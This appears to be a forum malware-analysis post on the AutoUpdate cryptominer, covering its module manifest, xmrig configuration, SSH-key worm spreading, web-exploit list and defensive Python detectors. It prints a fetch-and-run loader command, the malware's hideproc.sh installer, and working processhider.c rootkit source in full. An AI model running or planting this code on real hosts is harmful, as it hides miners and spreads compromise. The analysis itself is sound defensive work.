[Original] On dual-platform mining: analysis and discussion of the new AutoUpdate cryptomining malware
Posted: 2021-7-12 20:23 · 15244 views


Reference: https://mp.weixin.qq.com/s/kZExlJ62LVPOlufkurhBjw
Last weekend I read the Sangfor Qianlimu malware analysis report and my eyes lit up: a piece of malware that combines Windows, Linux and web-traffic attacks both tests an analyst's breadth of knowledge and poses a serious test to the current security situation. It also made me feel that binary and web have moved one step closer to each other. Full-stack is not that far out of reach!

After UPX unpacking it turns out to be a Go sample. Find the main function and locate the network connection.

The domain and the requested file name are both stored in plaintext in the binary.

Run the sample and watch its output (roughly, the program checks which of the malware's modules are present and, based on system information, downloads whichever ones are missing).

The requested file. The author was considerate enough to ship attack modules tailored to both platforms: http://m.windowsupdatesupport.org/d/windowsupdatev1.json
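As an added example (not code from the original post or from the malware), here is a small Python parser for that manifest format: it resolves each module path against the download directory seen above and separates the modules the loader merely stores from those it executes. The handle semantics (download = fetch only, downrun = fetch and run, update = fetch and run when the version differs) and the assumption that the paths live under the same /d/ directory as the manifest are inferred from the names, not confirmed by the post; the embedded manifest is abbreviated from the full one reproduced later on the page.

```python
"""Turn the windowsupdatev1.json stage-one manifest into a hunting list.

Per platform the manifest names each module, a "handle" telling the loader
what to do with it, a path on the download host and a version. This added
example (not code from the original post) resolves every path against the
download directory seen in the analysis and separates modules the loader only
stores from those it executes. Assumptions: handle meanings are inferred from
their names, and paths are taken to live under the same /d/ directory as the
manifest. The embedded manifest is abbreviated from the one on the page.
"""
import json
from urllib.parse import urljoin

BASE_URL = "http://m.windowsupdatesupport.org/d/"   # from the analysis above
HANDLE_RUNS = {"download": False, "downrun": True, "update": True}  # inferred

MANIFEST = """{
  "linux": [
    {"filename": "dbus",        "handle": "downrun",  "url": "/dbus",        "ver": "20210002"},
    {"filename": "hideproc.sh", "handle": "downrun",  "url": "/hideproc.sh", "ver": "20210002"},
    {"filename": "sshkey.sh",   "handle": "downrun",  "url": "/sshkey.sh",   "ver": "20210002"},
    {"filename": "kworkers",    "handle": "update",   "url": "/kworkers",    "ver": "20210008"}
  ],
  "windows": [
    {"filename": "inj.exe",        "handle": "download", "url": "/inj.exe",        "ver": "20210003"},
    {"filename": "autoupdate.exe", "handle": "downrun",  "url": "/autoupdate.exe", "ver": "20210012"}
  ]
}"""


def parse_manifest(text, base_url=BASE_URL):
    """Return one record per module with a fully qualified download URL."""
    modules = []
    for platform, entries in json.loads(text).items():
        for entry in entries:
            handle = entry["handle"]
            if handle not in HANDLE_RUNS:
                raise ValueError(f"unknown handle {handle!r} for {entry['filename']}")
            modules.append({
                "platform": platform,
                "filename": entry["filename"],
                # "/dbus" is joined onto the /d/ directory, not onto the host root
                "url": urljoin(base_url, entry["url"].lstrip("/")),
                "version": entry["ver"],
                "runs": HANDLE_RUNS[handle],
            })
    return modules


def ioc_urls(modules):
    """Every URL the loader may fetch: block or alert on these at the proxy."""
    return sorted({m["url"] for m in modules})


def executed_files(modules, platform):
    """File names the loader writes and then executes on the given platform:
    the artefacts to look for on disk and in process listings."""
    return sorted(m["filename"] for m in modules
                  if m["platform"] == platform and m["runs"])


if __name__ == "__main__":
    mods = parse_manifest(MANIFEST)
    print("download URLs:")
    for u in ioc_urls(mods):
        print("  ", u)
    for plat in ("linux", "windows"):
        print(f"{plat} modules executed by the loader:", executed_files(mods, plat))
```

Feed the full manifest from the page into parse_manifest() to get the complete list; the executed_files() output for linux is the same set of names the process-hiding hook later filters out of /proc.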

I start debugging from the network request in main, setting a breakpoint just before it.

Break on the address with b *0x6681ef and watch the subsequent behaviour.

Well, it crashed ("Captain, very spirited!", as the meme goes); gdb crashes every time I debug it. Rather than waste time, I switched to a different approach. (Note to self: try ltrace and strace next time.)
Capture the traffic with tcpdump, reconstruct the program's subsequent behaviour from the flows, and export the HTTP objects.

Well, it pulled down the whole kit for me; let's go through the rest one by one.


(Oh, it drops a PE on my Ubuntu box, nice!! Are you going to install Wine for me too?)

Without further ado, Huorong Sword (火绒剑) and Procmon, the right tools for the job.

(Hm, did I scare this program? Has it given in under my might? Fine, I'll have a look at it without running it.)
Drop it into IDA, which complains that a DLL is missing (puzzled face).

Find the place where that module is loaded dynamically.

From experience, most miners are modified or wholesale copies of open-source GitHub projects, so run strings to dump every string in the binary; this turns up the following configuration file (reproduced at the end of the post):

A search on GitHub finally turns up its ancestor:
https://github.com/xmrig/xmrig
To avoid being recognised, the author also went through and replaced the identifying strings (genuinely painstaking work).


In fact, the domain xmmrig.com does not exist at all!
The program installs every component the mining needs for you; it really looks after its customers!!!

The dbus program is derived from the open-source xmrig miner on GitHub.

hideproc.sh downloads the processhider.c module, compiles it into /usr/local/lib/libc2.28.so (a name that mimics glibc's libc-2.28.so) and appends that path to /etc/ld.so.preload. From then on every dynamically linked program started on the host loads the library before anything else; statically linked binaries are unaffected, which is why a static busybox ps still shows the truth.

The library hooks readdir()/readdir64() and drops the entries for the processes kworkers | dbus | autoupdate whenever /proc is being listed, so ps, top and anything else that enumerates /proc no longer shows them.
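Detecting this on a host: because the hook only filters readdir(), a direct stat() of /proc/<pid> for every candidate pid is not affected, and the difference between the two views is the set of hidden processes. The following Python check is an added example, not code from the original post or from the malware; it assumes Linux with procfs mounted at /proc and an allow-list of legitimate ld.so.preload entries that you adjust for your fleet.

```python
"""Check a Linux host for the ld.so.preload process-hiding technique.

The hook filters entries out of readdir() on /proc, so anything that lists
/proc (ps, top, os.listdir) misses the hidden pids. A direct stat() of
/proc/<pid> for every possible pid never goes through readdir(), so the
difference between the two views is exactly the set of hidden processes.
Added example, not code from the original post. Assumes procfs at /proc.
"""
import os

# Preload entries considered legitimate on this fleet (assumption; adjust).
KNOWN_GOOD_PRELOADS = set()


def suspicious_preload_entries(preload_text, known_good=KNOWN_GOOD_PRELOADS):
    """Return the shared objects named in an /etc/ld.so.preload body that are
    not allow-listed. Format: one path per line, '#' comments allowed. On a
    clean host the file is normally absent or empty."""
    hits = []
    for line in preload_text.splitlines():
        path = line.strip()
        if path and not path.startswith("#") and path not in known_good:
            hits.append(path)
    return hits


def hidden_pids(listed, probed):
    """Pids the stat() probe found that the readdir() listing did not show."""
    return sorted(set(probed) - set(listed))


def listed_pids(proc="/proc"):
    """Process ids as returned by readdir() on /proc: the hookable view."""
    return {int(n) for n in os.listdir(proc) if n.isdigit()}


def probed_pids(proc="/proc"):
    """Process ids found by stat()ing /proc/<pid> for 1..pid_max. This walks
    up to pid_max (often 4194304) paths and takes a few seconds, which is
    acceptable for an incident-response check."""
    with open(os.path.join(proc, "sys", "kernel", "pid_max")) as f:
        pid_max = int(f.read())
    return {pid for pid in range(1, pid_max + 1)
            if os.path.exists(os.path.join(proc, str(pid)))}


def comm(pid, proc="/proc"):
    """Command name of a pid, or '?' if it exited meanwhile."""
    try:
        with open(os.path.join(proc, str(pid), "comm")) as f:
            return f.read().strip()
    except OSError:
        return "?"


def scan(proc="/proc", preload_file="/etc/ld.so.preload"):
    """Run both checks on the live host and return the findings."""
    findings = {"preload": [], "hidden": []}
    if os.path.exists(preload_file):
        with open(preload_file) as f:
            findings["preload"] = suspicious_preload_entries(f.read())
    candidates = hidden_pids(listed_pids(proc), probed_pids(proc))
    # A process started during the slow probe would look hidden; re-check each
    # candidate against a fresh readdir() view before reporting it.
    relisted = listed_pids(proc)
    for pid in candidates:
        if pid not in relisted and os.path.exists(os.path.join(proc, str(pid))):
            findings["hidden"].append((pid, comm(pid, proc)))
    return findings


if __name__ == "__main__":
    result = scan()
    for path in result["preload"]:
        print(f"[!] unexpected preload library: {path}")
    for pid, name in result["hidden"]:
        print(f"[!] hidden process: pid={pid} comm={name}")
    if not result["preload"] and not result["hidden"]:
        print("no preload tampering or hidden processes found")
```

Run it as root so that /proc/<pid>/comm is readable for every process. A statically linked busybox ps gives a third, independent view, since ld.so.preload only affects dynamically linked programs; if the three views disagree, the preload file and the library it names are the first things to collect.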


(Right off the bat it kills off the competition and other mining processes... so malware authors have their own rat race. Worth collecting; next time I'm on an incident I'll run this script first.)

The sshkey.sh stage looks up the egress IP, searches for local SSH private keys and .pem certificate files, and finally reads known_hosts to find the machines this host has previously connected to.

Using the harvested private keys it then connects to those machines and makes them download loader.sh, spreading like a worm; with that the loop is closed.

It has lateral-movement capability; the risk is high.
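From the responder's side, the same data the sshkey.sh stage harvests tells you where to look next. The Python below is an added example, not code from the original post or from the malware: it parses known_hosts into the list of candidate next hops (hashed entries are counted but cannot be read back, by the attacker or by you) and checks which private key files are stored without a passphrase, which are the keys the worm can use and the ones to rotate first. The known_hosts content and the key files are constructed for the demonstration.

```python
"""Enumerate what the sshkey.sh stage would have harvested from a compromised
host, seen from the responder's side: which hosts were previously reached over
SSH (the worm's candidate next hops) and which private keys are usable without
a passphrase (the ones to rotate first). Added example, not code from the
original post; the known_hosts content and key files below are constructed.
"""
import base64
import re
import struct

# Constructed known_hosts sample covering the forms the parser must handle.
SAMPLE_KNOWN_HOSTS = """\
# constructed sample, not a real file
10.0.0.5,db01 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyOne
[10.0.0.9]:2222 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleKeyTwo
|1|c2FsdHNhbHRzYWx0c2FsdHM=|aGFzaGVkaG9zdG5hbWU= ecdsa-sha2-nistp256 AAAAE2VjExampleKeyThree
@cert-authority *.corp.example ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleKeyFour
"""


def parse_known_hosts(text):
    """Return (hosts, hashed_count).

    Each line is: [@marker] hostlist keytype base64key [comment]. The hostlist
    is comma-separated and uses [host]:port for non-default ports. Entries of
    the form |1|salt|hash are hashed (HashKnownHosts yes) and cannot be read
    back, so they are only counted: the attacker is equally blind to them.
    """
    hosts, hashed = set(), 0
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        if fields[0].startswith("@"):          # @cert-authority / @revoked
            fields = fields[1:]
        if len(fields) < 3:
            continue
        for host in fields[0].split(","):
            if host.startswith("|1|"):
                hashed += 1
                continue
            m = re.fullmatch(r"\[([^\]]+)\]:(\d+)", host)
            hosts.add(f"{m.group(1)}:{m.group(2)}" if m else host)
    return sorted(hosts), hashed


def private_key_is_unencrypted(key_text):
    """True if a private key file can be used without a passphrase.

    Legacy PEM keys mark encryption with a 'Proc-Type: 4,ENCRYPTED' header.
    OpenSSH-format keys (BEGIN OPENSSH PRIVATE KEY) carry the cipher in the
    binary blob: the magic "openssh-key-v1\\0" followed by a length-prefixed
    cipher name; "none" means the private part is stored in the clear.
    """
    if "PRIVATE KEY-----" not in key_text:
        return False
    if "Proc-Type: 4,ENCRYPTED" in key_text:
        return False
    if "BEGIN OPENSSH PRIVATE KEY" not in key_text:
        return True                            # legacy PEM, no encryption header
    body = "".join(l for l in key_text.splitlines() if not l.startswith("-----"))
    blob = base64.b64decode(body)
    magic = b"openssh-key-v1\0"
    if not blob.startswith(magic) or len(blob) < len(magic) + 4:
        return False
    (n,) = struct.unpack(">I", blob[len(magic):len(magic) + 4])
    cipher = blob[len(magic) + 4:len(magic) + 4 + n]
    return cipher == b"none"


def constructed_openssh_key(cipher):
    """Build a truncated OpenSSH-format key file that stops right after the
    cipher name; only the header is parsed above, so this exercises both
    branches. Constructed test data, not a real key."""
    blob = b"openssh-key-v1\0" + struct.pack(">I", len(cipher)) + cipher
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


def triage_keys(key_files):
    """Map {path: file_text} to the paths whose keys the worm could use directly."""
    return sorted(p for p, t in key_files.items() if private_key_is_unencrypted(t))


if __name__ == "__main__":
    hosts, hashed = parse_known_hosts(SAMPLE_KNOWN_HOSTS)
    print("candidate next hops:", hosts, f"(+{hashed} hashed, unreadable)")
    keys = {"/root/.ssh/id_ed25519": constructed_openssh_key(b"none"),
            "/home/ops/.ssh/id_rsa": constructed_openssh_key(b"aes256-ctr")}
    print("keys usable without passphrase:", triage_keys(keys))
```

On a real host, read every ~/.ssh/known_hosts and every file under ~/.ssh (and any *.pem the script would have found) for all users, including root, and treat every host returned as potentially already infected; check it for the same loader.sh and the preload library before trusting anything it reports.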

(Disclaimer: my knowledge of web vulnerabilities and Java is not deep; if anything is wrong, I welcome discussion.)

First UPX unpacking; well, another Go program. Look at the export table (a real treasure trove).


Let's go through the scanning modules in the main package one by one (there are many more attack modules, of course; I won't embarrass myself listing them all).

xxljob (weak-password login to the admin console?)
I can't determine which vulnerability this is. At first I thought it was the XXL-JOB executor unauthenticated access, but I never found the corresponding JSON string.

mongo-express remote code execution (CVE-2019-10758)
Reference: https://vulhub.org/#/environments/mongo-express/CVE-2019-10758/

Shiro deserialization (CVE-2016-4437)
Reference: https://vulhub.org/#/environments/shiro/CVE-2016-4437/

Tomcat password brute force
(played with this one before, hahaha)

Seeyon (Zhiyuan OA remote code execution)
Reference: https://mrxn.net/news/620.html

Seeyon (Zhiyuan OA arbitrary file upload)
Reference: https://www.cnblogs.com/sketchpl4ne/p/14515113.html

Weaver (Fanwei) OA remote code execution
Reference: https://blog.csdn.net/qq_41757280/article/details/101198845

Yonyou (UFIDA) OA remote command execution
Reference: https://blog.csdn.net/m0_58434634/article/details/117547164

Docker daemon API unauthenticated access
Reference:
https://vulhub.org/#/environments/docker/unauthorized-rce/

Struts2 (including S2-008, S2-013, S2-015, S2-016, S2-045, S2-046, S2-057)


Jenkins plugin remote code execution (uncertain)

WebLogic console remote code execution

fastjson 1.2.47 remote command execution

Find the main.DownLoadFile function and follow its cross-references.
It downloads the dubbo.jar module

and the attack parameters that go with dubbo.jar.


The command carried in the dubbo.jar configuration is
curl http://m.windowsupdatesupport.org/d/loader.sh | sh
i.e. the same loader is pushed onto new victims through the known web vulnerabilities listed above; this is the web side of the lateral spread.

Decompiling dubbo.jar shows that it contains both a quick detection module and the exp (exploit) modules.

It is run with the parameters shown above.
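A detection for the delivery step: flag command lines that pipe a download straight into a shell, and escalate when the parent is a web or container service, since that is the footprint of an exploited Struts, Shiro, WebLogic or Docker API endpoint spawning curl http://.../loader.sh | sh. This Python triage is an added example, not code from the original post; the event shape (parent process name plus command line), the list of service parents and the sample events are assumptions and constructed data, while the C2 host name comes from the analysis above.

```python
"""Flag download-and-execute command lines like the one the dubbo.jar payload
runs (curl <url>/loader.sh | sh), with extra weight when the spawning parent is
a web or container service: that is the footprint of the web-exploit modules
listed above. Added example, not code from the original post. The event shape
(parent process name + command line) and the parent list are assumptions about
what an EDR or auditd exec feed provides; the events below are constructed.
"""
import re

# Download tool whose output is piped into a shell: `curl ... | sh`, `wget -O- ... | bash`
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;&\n]*\|\s*(?:ba|da|z|k)?sh\b")
# Shell executing the substituted download: `bash -c "$(curl ...)"`
SUBST_EXEC = re.compile(r"\b(?:ba|da|z|k)?sh\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b")
# Parents that should not normally spawn shells fetching remote scripts (assumption).
SERVICE_PARENTS = {"java", "node", "dockerd", "containerd-shim",
                   "containerd-shim-runc-v2", "php-fpm"}
# Infrastructure named in the analysis above.
KNOWN_BAD_HOSTS = {"m.windowsupdatesupport.org"}

SAMPLE_EVENTS = [  # constructed exec events
    {"parent": "java", "cmdline": "/bin/sh -c curl http://m.windowsupdatesupport.org/d/loader.sh | sh"},
    {"parent": "bash", "cmdline": "curl -s https://api.internal.example/health"},
    {"parent": "java", "cmdline": "wget -q -O- http://203.0.113.10/x.sh | bash"},
    {"parent": "bash", "cmdline": "bash -c \"$(curl -fsSL https://get.example/install.sh)\""},
    {"parent": "java", "cmdline": "/usr/bin/python3 manage.py migrate"},
]


def classify(event):
    """Return (severity, reasons) for one exec event; severity is None if benign."""
    cmd = event["cmdline"]
    reasons = []
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("download piped to shell")
    if SUBST_EXEC.search(cmd):
        reasons.append("command substitution of download")
    if not reasons:
        return None, []
    for host in KNOWN_BAD_HOSTS:
        if host in cmd:
            reasons.append(f"known C2 host {host}")
    if event["parent"] in SERVICE_PARENTS:
        reasons.append(f"spawned by service process {event['parent']}")
        return "high", reasons
    return "medium", reasons


def triage(events):
    """Run classify() over a feed and return the flagged events with their index."""
    hits = []
    for i, ev in enumerate(events):
        severity, reasons = classify(ev)
        if severity:
            hits.append({"index": i, "severity": severity,
                         "reasons": reasons, "cmdline": ev["cmdline"]})
    return hits


if __name__ == "__main__":
    for h in triage(SAMPLE_EVENTS):
        print(f"[{h['severity']}] #{h['index']}: {h['cmdline']}")
        for r in h["reasons"]:
            print("    -", r)
```

The medium-severity hit shows the trade-off: an administrator's `bash -c "$(curl ... install.sh)"` matches the same pattern, so the parent process, not the command shape alone, is what separates routine provisioning from a web shell dropping loader.sh.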

That concludes the analysis. This sample covers a remarkably broad range of topics and is ideal for practice. Over the past two years trojans targeting enterprise servers have multiplied and the gap between binary and web keeps shrinking; let this be a warning to fellow security people: well-rounded skills are the way forward.

# Off topic
I am currently job hunting and hope this post serves as an opener to land a position I like, in Beijing or Tianjin. Thanks!!
I'm new to web; if the analysis is wrong anywhere, discussion is welcome.

Contents of windowsupdatev1.json, the module manifest requested from m.windowsupdatesupport.org/d/:

{
  "linux": [{
    "filename": "download",
    "handle": "download",
    "url": "/download",
    "ver": "20210002"
  },{
    "filename": "dbus",
    "handle": "downrun",
    "url": "/dbus",
    "ver": "20210002"
  },{
    "filename": "hideproc.sh",
    "handle": "downrun",
    "url": "/hideproc.sh",
    "ver": "20210002"
  },{
    "filename": "sshkey.sh",
    "handle": "downrun",
    "url": "/sshkey.sh",
    "ver": "20210002"
  },{
    "filename": "autoupdate",
    "handle": "downrun",
    "url": "/autoupdate",
    "ver": "20210012"
  },{
    "filename": "kworkers",
    "handle": "update",
    "url": "/kworkers",
    "ver": "20210008"
  }
  ],
  "windows": [{
    "filename": "service.exe",
    "handle": "update",
    "url": "/service.exe",
    "ver": "20210008"
  },{
    "filename": "inj.exe",
    "handle": "download",
    "url": "/inj.exe",
    "ver": "20210003"
  },{
    "filename": "runtime.dll",
    "handle": "download",
    "url": "/runtime.dll",
    "ver": "20210003"
  },{
    "filename": "autoupdate.exe",
    "handle": "downrun",
    "url": "/autoupdate.exe",
    "ver": "20210012"
  },{
    "filename": "updater.exe",
    "handle": "downrun",
    "url": "/updater.exe",
    "ver": "20210003"
  }]
}
Miner configuration recovered with strings (xmrig config.json format; the pool is the same C2 host, m.windowsupdatesupport.org:443 over TLS, and the developer donation level is set to 0):

{
 "api": {
     "id": null,
     "worker-id": null
 },
 "http": {
     "enabled": true,
     "host": "127.0.0.1",
     "port": 61254,
     "access-token": null,
     "restricted": true
 },
 "autosave": true,
 "background": true,
 "colors": true,
 "title": true,
 "randomx": {
     "init": -1,
     "init-avx2": -1,
     "mode": "auto",
     "1gb-pages": false,
     "rdmsr": true,
     "wrmsr": true,
     "cache_qos": false,
     "numa": true,
     "scratchpad_prefetch_mode": 1
 },
 "cpu": {
     "enabled": true,
     "cpu-affinity":3,
     "threads":3,
     "huge-pages": true,
     "huge-pages-jit": false,
     "hw-aes": null,
     "priority": null,
     "memory-pool": false,
     "yield": true,
     "max-threads-hint": 50,
     "asm": true,
     "argon2-impl": null,
     "astrobwt-max-size": 550,
     "astrobwt-avx2": false,
     "cn/0": false,
     "cn-lite/0": false
 },
 "opencl": {
     "enabled": false,
     "cache": true,
     "loader": null,
     "platform": "AMD",
     "adl": true,
     "cn/0": false,
     "cn-lite/0": false
 },
 "cuda": {
     "enabled": false,
     "loader": null,
     "nvml": true,
     "cn/0": false,
     "cn-lite/0": false
 },
 "donate-level": 0,
 "donate-over-proxy":0 ,
 "log-file": null,
 "pools": [
     {
         "algo": null,
         "coin": null,
         "url": "m.windowsupdatesupport.org:443",
         "user": "x",
         "pass": "x",
         "rig-id": null,
         "nicehash": true,
         "keepalive": false,
         "enabled": true,
         "tls": true,
         "tls-fingerprint": null,
         "daemon": false,
         "socks5": null,
         "self-select": null,
         "submit-to-origin": false
     }
 ],
 "print-time": 60,
 "health-print-time": 60,
 "dmi": true,
 "retries": 5,
 "retry-pause": 5,
 "syslog": false,
 "tls": {
     "enabled": true,
     "protocols": null,
     "cert": null,
     "cert_key": null,
     "ciphers": null,
     "ciphersuites": null,
     "dhparam": null
 },
 "user-agent": null,
 "verbose": 0,
 "watch": true,
 "pause-on-battery": false,
 "pause-on-active": false
}
hideproc.sh (installs the process-hiding library; malware code as recovered, comments added):

#!/bin/bash
if [ "$EUID" -ne 0 ]
  then echo "Please run as root"
else
  if [ `grep libc2.28 /etc/ld.so.preload`  ]
  then echo "hideproc already done!!"
  else
    # Get a compiler onto whichever distro family this is (Debian/Ubuntu,
    # RHEL/CentOS, Fedora); the package commands that do not apply just fail.
    apt-get update -y
    apt-get install build-essential -y
    yum check-update
    yum install build-essential -y
    dnf groupinstall "Development Tools" -y
    yum group install "Development Tools"  -y
    curl http://m.windowsupdatesupport.org/d/processhider.c -o  processhider.c
 
    # Build the readdir() hook as a shared object whose name mimics glibc's
    # libc-2.28.so, then register it in /etc/ld.so.preload so that every
    # dynamically linked process started from now on loads it first.
    gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
    mv libc2.28.so /usr/local/lib/ -f
    grep libc2.28 /etc/ld.so.preload  || echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
    rm -f processhider.c
    # Self-test with the preload active: if ld.so cannot load the library it
    # prints an error naming libc2.28.so on stderr (captured via 2>&1). In that
    # case the preload file is emptied so that every process on the host does
    # not start printing loader errors.
    ls >/tmp/.1  2>&1
    grep libc2.28.so /tmp/.1 && echo >/etc/ld.so.preload
  fi
fi
processhider.c (the readdir() hook that hideproc.sh compiles into libc2.28.so):

#define _GNU_SOURCE
 
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
 
/*
 * Every process whose name matches this list is hidden. Note that the check
 * below is strstr(process_to_filter, process_name): any process whose name is
 * a substring of this string (e.g. "dbus", but also "bus" or "date") is
 * filtered out, whereas the original open-source processhider compares the
 * name for equality.
 */
static const char* process_to_filter = "kworkers|dbus|autoupdate";
 
/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
    int fd = dirfd(dirp);
    if(fd == -1) {
        return 0;
    }
 
    char tmp[64];
    snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
    ssize_t ret = readlink(tmp, buf, size);
    if(ret == -1) {
        return 0;
    }
 
    buf[ret] = 0;
    return 1;
}
 
/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
    if(strspn(pid, "0123456789") != strlen(pid)) {
        return 0;
    }
 
    char tmp[256];
    snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
 
    FILE* f = fopen(tmp, "r");
    if(f == NULL) {
        return 0;
    }
 
    if(fgets(tmp, sizeof(tmp), f) == NULL) {
        fclose(f);
        return 0;
    }
 
    fclose(f);
 
    int unused;
    sscanf(tmp, "%d (%[^)]s", &unused, buf);
    return 1;
}
 
#define DECLARE_READDIR(dirent, readdir)                                \
static struct dirent* (*original_##readdir)(DIR*) = NULL;               \
                                                                        \
struct dirent* readdir(DIR *dirp)                                       \
{                                                                       \
    if(original_##readdir == NULL) {                                    \
        original_##readdir = dlsym(RTLD_NEXT, #readdir);               \
        if(original_##readdir == NULL)                                  \
        {                                                               \
            fprintf(stderr, "Error in dlsym: %s\n", dlerror());         \
        }                                                               \
    }                                                                   \
                                                                        \
    struct dirent* dir;                                                 \
                                                                        \
    while(1)                                                            \
    {                                                                   \
        dir = original_##readdir(dirp);                                 \
        if(dir) {                                                       \
            char dir_name[256];                                         \
            char process_name[256];                                     \
            if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&        \
                strcmp(dir_name, "/proc") == 0 &&                       \
                get_process_name(dir->d_name, process_name) &&          \
                strstr( process_to_filter,process_name)) {         \
                continue;                                               \
            }                                                           \
        }                                                               \
        break;                                                          \
    }                                                                   \
    return dir;                                                         \
}
 
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);
Latest replies (3)
#2 · 2021-7-13 17:31
6666666666
#3 · 2021-7-14 11:28
666
#4 · 2021-7-16 19:42
Author email: n9nenacel@gmail.com